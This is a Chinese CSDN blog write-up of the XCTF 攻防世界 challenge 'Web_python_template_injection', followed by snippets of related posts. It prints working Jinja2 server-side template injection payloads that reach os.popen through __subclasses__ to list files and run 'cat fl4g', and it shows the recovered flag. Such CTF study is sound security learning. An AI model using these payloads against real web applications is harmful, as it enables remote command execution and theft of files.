[wp] Web_python_template_injection 攻防世界

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量506 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/104348049
版权

提示python模板注入,尝试{{1+1}}看看{{}}内的代码是否被执行

在这里插入图片描述
很明显被执行,说明有注入点
调用os模块的popen执行ls打印所有文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

当然我们也可以用os模块的listdir来打印文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir("./")}}

发现fl4g文件,flag应该就在这个文件里,接下来想办法读取这个文件
在这里插入图片描述

.执行cat命令查看目标文件

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

在这里插入图片描述ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

借鉴(https://blog.csdn.net/zss192/article/details/104199520)

jing!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1154
好难啊
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3505
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
攻防世界 Web_python_template_injection wp
weixin_45253216的博客
01-19 270
2021.1.19 今天把两个拖了很久的python模板注入做完了,感觉神清气爽! WP 进来后看到了题目的提示,python template injection,看样子是个模板注入,先测试一下。 1+1被计算成了2,并回显到页面上,说明存在模板注入,去百度一下template的注入姿势。 //调用os模块的popen执行ls打印所有文件 {{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("命令"
Web_python_template_injection(Python模块注入)
Welcome To Myon'Blog !
04-11 1405
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2334
攻防世界,python模板注入
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 962
【代码】【攻防世界Web_python_template_injection
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 285
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
wordpress之wp_nav_menu使用说明
09-29
在深入探讨wordpress中wp_nav_menu函数的使用说明之前,首先需要了解wp_nav_menu()方法是WordPress中用于创建导航菜单的一个重要功能。该方法定义在wp-includes/nav-menu-templates.php文件中,它的主要作用是通过...
在WordPress中使用wp_count_posts函数来统计文章数量
10-23
`wp_count_posts()`函数就是用于解决这一问题的关键工具。它是一个内置的WordPress函数,能够帮助开发者轻松获取不同状态的文章和页面的计数。 `wp_count_posts()`函数的主要作用是返回一个对象,该对象包含了所有...
WordPress导航菜单函数wp_nav_menu()详解
09-29
在WordPress的开发中,wp_nav_menu()是一个非常重要的函数,它用于实现和定制网站的导航菜单系统。自WordPress版本3.0起,该函数成为标准,取代了旧有的 wp_list_pages() 和 wp_page_menu(),为开发者提供了更灵活的...
详解WordPress中分类函数wp_list_categories的使用
10-23
在WordPress中,wp_list_categories是一个非常有用的函数,用于展示网站分类。这个函数有很多参数,可以在不同的使用场景下发挥不同的功能。接下来,我将详细介绍wp_list_categories函数的各个参数以及它们的功能和...
mysql_wp.rar_linux mysql
09-24
【标题】"mysql_wp.rar_linux mysql" 涉及的知识点主要集中在Linux环境下使用MySQL客户端工具的开发和实现上。这个压缩包包含了用于在Linux操作系统中与MySQL数据库交互的自编译程序及相关源代码。 1. **MySQL**: ...
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1659
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 715
Web_python_template_injection攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
web python template injection_攻防世界-Web_python_template_injection详解
weixin_39989668的博客
12-10 434
Web_python_template_injection在做这道题之前如果大家不懂可以先看一看这篇文章:从零学习flask模板注入基础知识:在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。1.判断有无模板注入payloadhttp://220.249.52.133:53362/{{7+7}}查看全局变量http://220.249.5...
【愚公系列】2023年05月 攻防世界-Web(Web_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
Web安全(Web_python_template_injection
m0_56010012的博客
03-01 1608
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1361
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
最新发布
08-14
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
Member 'make_shared' cannot have template
07-28
wp1 {p1}; // p1 owns the memory. \[1\] 引用\[2\]:You break this by usingweak_ptr. The "owner" typically useshared_ptrand the "owned" use aweak_ptrto its parent, and convert ittemporarilytoshared_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值